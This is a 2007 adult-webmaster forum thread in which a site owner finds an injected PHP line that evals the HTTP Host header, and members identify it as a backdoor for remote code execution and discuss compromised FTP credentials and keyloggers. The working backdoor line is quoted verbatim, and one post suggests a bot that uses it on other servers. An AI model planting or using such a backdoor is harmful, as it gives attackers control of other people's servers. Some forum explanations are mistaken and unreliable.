GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Found this code on my site after I signed it up with CCBILL .. (https://gfy.com/showthread.php?t=749393)

biskoppen 07-07-2007 02:51 AM

Found this code on my site after I signed it up with CCBILL ..
 
$s=@$_SERVER['HTTP_HOST'];if($s){@eval($s);exit;}

If was placed in one of my includefiles which is used all over.. and none of my pages were loading.. anyone got a clue what this is?

biskoppen 07-07-2007 04:18 AM

bump...

Just talked to another guy running a CCBILL site.. he told me they're not touching ones pages what-so-ever.. so I'm like what the fuck is going on here..

hand-held 07-07-2007 04:32 AM

In the parlance of our times... j00 g0t 0wn3d.

2012 07-07-2007 04:41 AM

at least you got a reach around
 
Quote:

Originally Posted by biskoppen (Post 12717223)
$s=@$_SERVER['HTTP_HOST'];if($s){@eval($s);exit;}

If was placed in one of my includefiles which is used all over.. and none of my pages were loading.. anyone got a clue what this is?

the code basically says "yes, I have a domain" then makes sure its a good one before fucking you and exiting and not finishing anything else ...

whats the rest of your code ?

biskoppen 07-07-2007 04:51 AM

Quote:

Originally Posted by fartfly (Post 12717355)
the code basically says "yes, I have a domain" then makes sure its a good one before fucking you and exiting and not finishing anything else ...

whats the rest of your code ?

That was all there was inserted... I think.. I go through it all a little closely

bl4h 07-07-2007 04:53 AM

hmm doesnt make sense to me. how does eval "make sure its good". the exit pretty much makes the whole thing a waste of time anyway. maybe they wanted to waste some cpu before screwing you with the exit :|

2012 07-07-2007 05:04 AM

Quote:

Originally Posted by bl4h (Post 12717362)
the exit pretty much makes the whole thing a waste of time anyway.

:thumbsup

biskoppen 07-07-2007 05:08 AM

How the fuck can anyone gain access to a brand new setup at webair... the only ones knowing my ftp login is CCBILL, they got it a few hours before this happened..

2012 07-07-2007 05:09 AM

... lots of ways

Tempest 07-07-2007 05:33 AM

If what I think is true, that will allow someone to run any php code on your site that they want.

sweetpurple04 07-07-2007 05:34 AM

seems like a conspiracy

biskoppen 07-07-2007 05:37 AM

Quote:

Originally Posted by Tempest (Post 12717412)
If what I think is true, that will allow someone to run any php code on your site that they want.

Yes ofcourse.. the eval with do that... hmmm... this looks more and more like an "evil" trespassing...

quantum-x 07-07-2007 06:36 AM

The code basically executes $_SERVER['HTTP_HOST'] [usually the name of your server] as a PHP commandm then dies.

It's definitely odd, as normally HTTP_HOST has your domainname in it - so executing that as PHP won't do dick - unless someone has already injected another value into it, or register_globals is on and you're getting fucked with.

bl4h 07-07-2007 06:37 AM

Quote:

Originally Posted by Tempest (Post 12717412)
If what I think is true, that will allow someone to run any php code on your site that they want.

oh shit youre right ! http_host is the hostname the client sends to the server so it can be anything ! y those bastards !

biskoppen 07-07-2007 06:55 AM

Quote:

Originally Posted by bl4h (Post 12717534)
oh shit youre right ! http_host is the hostname the client sends to the server so it can be anything ! y those bastards !

Ok, I get the whole picture now... isn't that just great

swampthing 07-07-2007 08:40 AM

your not the first person

SmokeyTheBear 07-07-2007 10:24 AM

is it in the very top or very bottom ?

KimJI 07-07-2007 10:35 AM

two of my clients reported the same thing.

It seems to be part of a botnet/Ddos tool.

What i read is, that code can be send to that host, and ask the host to exechute a remote script

SmokeyTheBear 07-07-2007 10:42 AM

Quote:

Originally Posted by KimJI (Post 12718082)
two of my clients reported the same thing.

It seems to be part of a botnet/Ddos tool.

What i read is, that code can be send to that host, and ask the host to exechute a remote script

yup , its used by seo spammers to include pages on your server that dont exist.. or a botnet

when was it modified..?

and try going to google and type site:yourdomain.com and see if there are any new pages indexed you dont recognize

Miguel T 07-07-2007 10:44 AM

How the hell can that be placed in EACH ones pages?

KimJI 07-07-2007 11:12 AM

Quote:

Originally Posted by AbsolutePorn (Post 12718121)
How the hell can that be placed in EACH ones pages?


because the server was compromised

digifan 07-07-2007 11:47 AM

Uh-oh, not fun for sure...

ladida 07-07-2007 11:55 AM

Quote:

Originally Posted by quantum-x (Post 12717532)
The code basically executes $_SERVER['HTTP_HOST'] [usually the name of your server] as a PHP commandm then dies.

It's definitely odd, as normally HTTP_HOST has your domainname in it - so executing that as PHP won't do dick - unless someone has already injected another value into it, or register_globals is on and you're getting fucked with.

You're wrong. This will work regardless off register globals. If he found that on his server, he's fucked, as that gives full server access.

just a punk 07-07-2007 12:16 PM

As I said in other thread it's a way to do php code injection.

just a punk 07-07-2007 12:20 PM

Quote:

Originally Posted by quantum-x (Post 12717532)
The code basically executes $_SERVER['HTTP_HOST'] [usually the name of your server] as a PHP commandm then dies.

It's definitely odd, as normally HTTP_HOST has your domainname in it - so executing that as PHP won't do dick - unless someone has already injected another value into it, or register_globals is on and you're getting fucked with.

You're wrong. Read this: http://ez.no/layout/set/printarticle...f_csrf_and_xss

ladida 07-07-2007 12:24 PM

Quote:

Originally Posted by cyberxxx (Post 12718503)

They can do alot more then that aswell.

bl4h 07-07-2007 12:50 PM

you should add a function to log hosts if theyre not equal to any of your domains or ips. log it and the ip it came from. follow the trail and hope you can find this dude and send him to bed with the fishes

ladida 07-07-2007 01:04 PM

Quote:

Originally Posted by bl4h (Post 12718668)
you should add a function to log hosts if theyre not equal to any of your domains or ips. log it and the ip it came from. follow the trail and hope you can find this dude and send him to bed with the fishes

Lol, ok, no jokes.

CCBillMatthewP 07-07-2007 02:21 PM

biskoppen,

This doesn't look like any of our codes, but please contact us with the info in my sig and we'll try and help you get this sorted out.

biskoppen 07-07-2007 02:46 PM

Quote:

Originally Posted by CCBillMatthewP (Post 12719070)
biskoppen,

This doesn't look like any of our codes, but please contact us with the info in my sig and we'll try and help you get this sorted out.

Matthew, any chance you could contact me via ICQ to discuss this?

My host says there's no way this came in besides FTP access, and besides me, you guys are the only ones having this info.. I entered in a sign up form at your site 2 hours before this happened (or so)

ICQ : 30898463

CCBillMatthewP 07-07-2007 02:53 PM

biskoppen,

Sorry but we don't have access to ICQ, the best way to contact us would either be email ([email protected]) or the phone numbers listed in my sig.

potter 07-07-2007 03:00 PM

Maybe you're computer itself is compromised. And/Or there is a leak in your information being sent out. They might have grabbed the FTP info you sent to ccbill. Via someone having access to your computer or email.

TheSenator 07-07-2007 03:02 PM

so... what is the status of this?

Damn CCBill doesn't have access to ICQ! Come on guys!

KimJI 07-07-2007 03:08 PM

Quote:

Originally Posted by potter (Post 12719218)
Maybe you're computer itself is compromised. And/Or there is a leak in your information being sent out. They might have grabbed the FTP info you sent to ccbill. Via someone having access to your computer or email.


There are other sites and server compromised, Its not only "biskoppen"

d-null 07-07-2007 03:13 PM

I was going to sign up for ccbill soon too.................. watching to see how this develops


and on the topic of ICQ, I had some hosting problems the other day and it was so impressive to be able to ICQ and actually talk with a live tech in the middle of the night (3 am local).... only needed to chat with him for 30 seconds or so but it was really reassuring to have available.

this really made a lasting impression on me

Pornopat 07-07-2007 03:17 PM

Pretty sure its not ccbill.

Zoose 07-07-2007 03:23 PM

Quote:

Originally Posted by jetjet (Post 12719267)
I was going to sign up for ccbill soon too.................. watching to see how this develops


and on the topic of ICQ, I had some hosting problems the other day and it was so impressive to be able to ICQ and actually talk with a live tech in the middle of the night (3 am local).... only needed to chat with him for 30 seconds or so but it was really reassuring to have available.

this really made a lasting impression on me

The chances this has anything to do with CCBill or anyone at CCBill are basically nil. Either his entire server was compromised, his ftp account with his host was compromised, or possibly a script he runs is vulnerable.

d-null 07-07-2007 03:26 PM

that makes the most sense

KimJI 07-07-2007 03:28 PM

I dont get why its not trackable throught the logfiles who did this? have you disabled logging?

biskoppen 07-07-2007 04:05 PM

Quote:

Originally Posted by KimJI (Post 12719332)
I dont get why its not trackable throught the logfiles who did this? have you disabled logging?

I was told that my logs is truncated every x hours when the stats is run

Tempest 07-07-2007 04:06 PM

Quote:

Originally Posted by bl4h (Post 12717534)
oh shit youre right ! http_host is the hostname the client sends to the server so it can be anything ! y those bastards !

Exactly...

That's interesting... Early this week I was contacted by one of my trades about a similar issue. He had went to some site that was compromised and it had installed a keylogger on his computer. The typical virus protectors like norton etc. didn't catch it. He was saying you needed something better like Kapersky.

These guys got his server login info and intalled the same thing on his site.. Apparently they seem to have it automated so it will download all the html (probably php as well), install the exploit and re upload them. Happens very fast. It could be that this is another "version" of that.

KimJI 07-07-2007 04:15 PM

Emagine how much traffic they can steal this way? just a few clicks from each sites can be millions in a few days

d-null 07-07-2007 04:23 PM

damn, almost like a person needs a separate computer for surfing and one for sensitive data and work

KimJI 07-07-2007 04:28 PM

Quote:

Originally Posted by jetjet (Post 12719607)
damn, almost like a person needs a separate computer for surfing and one for sensitive data and work


most serious people have.

Violetta 07-07-2007 04:31 PM

time to change your ftp password :)

biskoppen 07-07-2007 04:32 PM

Quote:

Originally Posted by Rockatansky (Post 12719648)
time to change your ftp password :)

Been there, done that :)

Tempest 07-07-2007 04:37 PM

Quote:

Originally Posted by biskoppen (Post 12719654)
Been there, done that :)

Scan your computer with Kapersky and Panda (or any other "better" virus programs) maybe first... if you have a keylogger on your system, they'll just get the new password anyway.

RawAlex 07-07-2007 05:06 PM

Here are some potential sources of infection:

1 - your own PC could be infected, anything from a keylogger to a total owning of your PC.

2 - Someone at CCBill could also have a computer with similar ownage.

3 - Your server maybe have been owned either remotely or server to server within your host (a real issue at times with some hosts). This could be from a CMS or similar.


Basically, sounds like you got owned pretty majorly. start changing passwords (all passwords, all users with FTP or telnet access, the SU password, etc) and getting your hosting company to looks for holes, including cron tasks, open files, extra users, odd logins, etc.

Good luck.

bu((aneer 07-07-2007 05:18 PM

Quote:

Originally Posted by biskoppen (Post 12719169)
Matthew, any chance you could contact me via ICQ to discuss this?

My host says there's no way this came in besides FTP access, and besides me, you guys are the only ones having this info.. I entered in a sign up form at your site 2 hours before this happened (or so)

ICQ : 30898463




FTP passwords are sent via plain/clear text. Very easy to pick them off the wire!

milambur 07-08-2007 11:40 AM

Shouldn't be so hard to make a bot that removes that code on all servers it can find, since you can use the exploit to remove the exploit. Maybe have it send the admin an email that the server has been compromised before removing it. I don't have the time, but maybe smokey can do it?


All times are GMT -7. The time now is 10:04 AM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2026, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123